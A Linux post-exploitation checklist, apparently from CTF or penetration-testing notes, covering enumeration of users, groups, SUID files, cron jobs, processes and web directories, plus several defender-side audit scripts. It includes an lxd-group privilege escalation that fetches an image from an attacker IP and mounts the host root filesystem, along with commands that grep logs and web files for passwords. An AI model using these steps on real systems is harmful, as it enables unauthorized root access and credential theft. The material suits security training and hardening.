# Post Exploit Checks

## General Enumeration

* Check whether you are on a real host or inside a container

```bash
ls -la / # a /.dockerenv (or similar dot file in /) indicates a Docker container rather than a real host
hostname
```

* Know the permissions of the user

```bash
sudo -l
id
```

* Know the users

```bash
cat /etc/passwd
```

* Check for `.htaccess` file
* `/etc/apache2/sites-enabled/*`
* `/etc/nginx/nginx.conf`
* `/etc/ssh/sshd_config`
* Application-specific configs: `wp-config.php`, `settings.php`, etc.

## Groups Exploitation

### 4(adm)

* Members of the adm group can read the log files under `/var/log`

```bash
cd /var/log
grep -EnRi password .
```

**Machine:**

* Academy - HTB : <https://www.youtube.com/watch?v=yQl5RA6APyQ&t=2620>
* Doctor - HTB : <https://youtube.com/watch?v=JcOR9krOPFY&t=1780>

### 116(lxd)

* Members of the lxd group can build a container image, start it as a privileged container, and mount the host's root filesystem inside it

```bash
# attacker machine
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

# victim machine
lxd init # accept the defaults
wget http://10.10.14.71/alpine-v3.15-x86_64-20220227_1714.tar.gz
lxc image import ./alpine-v3.15-x86_64-20220227_1714.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true # expected output: Creating ignite
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true # expected output: Device mydevice added to ignite
lxc start ignite
lxc exec ignite /bin/sh # the shell inside the ignite container runs as root
cd /mnt/root # the victim machine's root filesystem
```
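The adm and lxd groups above are two instances of a wider problem: group memberships that are effectively root. As an added defender-side check that is not part of the original page, the shell function below reads a group file and lists every account that belongs to a group from a configurable list of risky groups. The list in `RISKY_GROUPS` is an assumption to tune for your own fleet, and the `--run` flag is only a convenience for running the file stand-alone.

```shell
#!/bin/sh
# Report accounts that belong to groups known to grant root-equivalent access.
# Usage: risky_group_members [GROUP_FILE]   (defaults to /etc/group)
# Output: one "group:member" pair per line, sorted.

# Groups whose membership is effectively root (assumption: adjust per fleet).
RISKY_GROUPS="adm lxd docker sudo wheel disk shadow"

risky_group_members() {
  group_file="${1:-/etc/group}"
  for g in $RISKY_GROUPS; do
    # /etc/group line format: name:password:gid:member1,member2
    # exact match on the group name, then take the member list (4th field)
    members=$(awk -F: -v g="$g" '$1 == g { print $4 }' "$group_file")
    [ -n "$members" ] || continue
    printf '%s\n' "$members" | tr ',' '\n' | while IFS= read -r m; do
      if [ -n "$m" ]; then
        printf '%s:%s\n' "$g" "$m"
      fi
    done
  done | sort
}

# Stand-alone use: sh groups_audit.sh --run [GROUP_FILE]
if [ "${1:-}" = "--run" ]; then
  shift
  risky_group_members "$@"
fi
```

Run it periodically (or from a configuration-management check) and diff the output against an approved list; a new name appearing next to `lxd` or `docker` is a finding worth a ticket.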

## Files Enumeration

* Find suid binaries

```bash
find / -perm /4000 -ls 2>/dev/null
```

* Find Writeable files

```bash
find / -type f -writable 2>/dev/null | grep -v proc
```

* Find files owned by a specific group

```bash
# ! -path <path> - omits files from the mentioned directory
# -group <group name> - group name
find / -group www-data ! -path "/proc/*" ! -path "/var/www*" 2>/dev/null
```

* Locations to check

```bash
ls /opt
ls /usr/local/bin
ls ~/.local/bin
```
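The SUID search at the top of this section lists every set-id binary, but on a real host most of those are expected (`sudo`, `passwd`, `mount`, ...). As an added example, not part of the original page, the function below compares the set-id files under a directory against a baseline file of known-good paths and prints only the unexpected ones; the baseline format (one absolute path per line, e.g. captured on a fresh install of the same image) and the `--run` convenience flag are assumptions of this example.

```shell
#!/bin/sh
# List setuid/setgid files under ROOT that are not in a known-good baseline.
# Usage: unexpected_setid_files ROOT BASELINE
#   ROOT     directory to scan (use / on a live host)
#   BASELINE file with one absolute path per line, as printed by find
# Output: set-id files not present in the baseline, one per line.

unexpected_setid_files() {
  root="$1"
  baseline="$2"
  # -xdev: stay on one filesystem so /proc, overlay mounts and network shares
  #        are not walked; -perm -4000 / -2000: setuid / setgid bit set
  find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null \
    | sort \
    | grep -v -x -F -f "$baseline" || [ $? -eq 1 ]
  # grep exits 1 when every file is baselined; that is the good case, so
  # only a real grep error (status 2, e.g. missing baseline) propagates
}

# Stand-alone use: sh setid_audit.sh --run / /etc/setid.baseline
if [ "${1:-}" = "--run" ]; then
  shift
  unexpected_setid_files "$@"
fi
```

Generate the baseline with the same `find` invocation on a trusted build, store it somewhere the audited host cannot rewrite, and alert on any non-empty output.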

## Background Jobs Enumeration

* Crontabs

```bash
crontab -l
cat /etc/crontab
```

* Enumerate processes with [pspy](https://github.com/DominicBreuker/pspy)
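Reading `/etc/crontab` tells you what runs and as whom; the risk is a job that runs as root but executes a script other users can edit. As an added defender-side example, not part of the original page, the function below parses a system crontab (the format with a user field, including `@reboot`-style lines) and reports every entry whose program file is group- or world-writable. It only checks absolute paths, since a bare command name depends on the job's `PATH`; the `--run` flag is a convenience assumed by this example.

```shell
#!/bin/sh
# Flag system-crontab entries whose program file can be modified by someone
# other than its owner (group- or world-writable).
# Usage: cron_writable_targets [CRONTAB_FILE]   (defaults to /etc/crontab)
# Output: "user program" per offending entry.

cron_writable_targets() {
  crontab_file="${1:-/etc/crontab}"
  # System crontab format: min hour dom mon dow user command...
  # Shorthand lines:       @reboot|@daily|... user command...
  awk '
    /^[[:space:]]*(#|$)/        { next }            # comments and blank lines
    /^[A-Za-z_][A-Za-z0-9_]*=/  { next }            # SHELL=, PATH=, MAILTO=
    $1 ~ /^@/                   { print $2, $3; next }
                                { print $6, $7 }
  ' "$crontab_file" | while read -r user prog; do
    # only absolute paths can be checked; "cd / && run-parts ..." is skipped
    case "$prog" in /*) ;; *) continue ;; esac
    [ -e "$prog" ] || continue
    # -perm -020: group-writable, -perm -002: world-writable
    if [ -n "$(find "$prog" -prune \( -perm -020 -o -perm -002 \) -print 2>/dev/null)" ]; then
      printf '%s %s\n' "$user" "$prog"
    fi
  done
  return 0
}

# Stand-alone use: sh cron_audit.sh --run [/etc/crontab]
if [ "${1:-}" = "--run" ]; then
  shift
  cron_writable_targets "$@"
fi
```

The same check applies to the directory the script lives in (a writable parent directory lets the file be replaced) and to the drop-in directories under `/etc/cron.d`; extend the loop accordingly for your environment.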

## Network Enumeration

* List the network interfaces (the host may be attached to internal networks)

```bash
ip a
```

* Open Ports and services

```bash
netstat -antp
# look for unusual services listening internally, or a mysql service
```

## Process Enumeration

* Enumerate the services that are running

```bash
ps aux
```

* Get more information about a process (e.g. its command-line arguments, which may contain passwords)

```bash
# get the process id from ps aux; arguments in cmdline are NUL-separated, so make them readable
cat /proc/<processid>/cmdline | tr '\0' ' '
```
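Doing the `cmdline` check one process at a time is slow, and from a defender's side the goal is to find every service that receives a credential on its command line so it can be moved to a config file or environment. As an added example that is not part of the original page, the function below walks a `/proc`-style tree, joins each process's NUL-separated arguments, and reports the ones matching a loose credential pattern. The pattern (a `-p` option followed directly by a value, `--password`, or `key=value` with a secret-looking key) is a heuristic assumed by this example and will also flag harmless options such as `-print`, so review the output by hand; passing a directory other than `/proc` is only there to make the function testable offline.

```shell
#!/bin/sh
# Find running processes whose command line carries a credential.
# Usage: cmdline_secret_processes [PROC_ROOT]   (defaults to /proc)
# Output: "pid: argv" per match.

cmdline_secret_processes() {
  proc_root="${1:-/proc}"
  for d in "$proc_root"/[0-9]*; do
    [ -r "$d/cmdline" ] || continue
    # /proc/<pid>/cmdline separates arguments with NUL bytes; join with spaces
    args=$(tr '\0' ' ' < "$d/cmdline" | sed 's/[[:space:]]*$//')
    [ -n "$args" ] || continue          # kernel threads have an empty cmdline
    # heuristic patterns: mysql-style -pSECRET, --password[=...], KEY=value
    if printf '%s' "$args" | grep -qiE -- '(^| )-p[^ ]|--password|(password|passwd|secret|token|api[_-]?key)='; then
      printf '%s: %s\n' "${d##*/}" "$args"
    fi
  done
  return 0
}

# Stand-alone use: sh cmdline_audit.sh --run [/proc]
if [ "${1:-}" = "--run" ]; then
  shift
  cmdline_secret_processes "$@"
fi
```

Note that `/proc/<pid>/cmdline` is world-readable on most systems unless `hidepid` is set on the `/proc` mount, which is why a secret passed as an argument is exposed to every local account.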

## Web Directories

* Check the web directories for passwords

```bash
ls -la /var/www/*
grep -EnRi password /var/www/ 2>/dev/null # application config files often hold database credentials
```

## MySQL

* If MySQL is running as **root** on the machine, check for privilege escalation via a UDF library
* <https://book.hacktricks.xyz/network-services-pentesting/pentesting-mysql#privilege-escalation-via-library>
* <https://raw.githubusercontent.com/d7x/udf_root/master/udf_root.py>
* Terminating a query with `\G` instead of `;` makes the mysql client print each row vertically, which is easier to read for wide tables

```bash
# connecting to mysql
mysql -u root -p
# password prompt

mysql> select * from wp_users \G # instead of "select * from wp_users;"
```
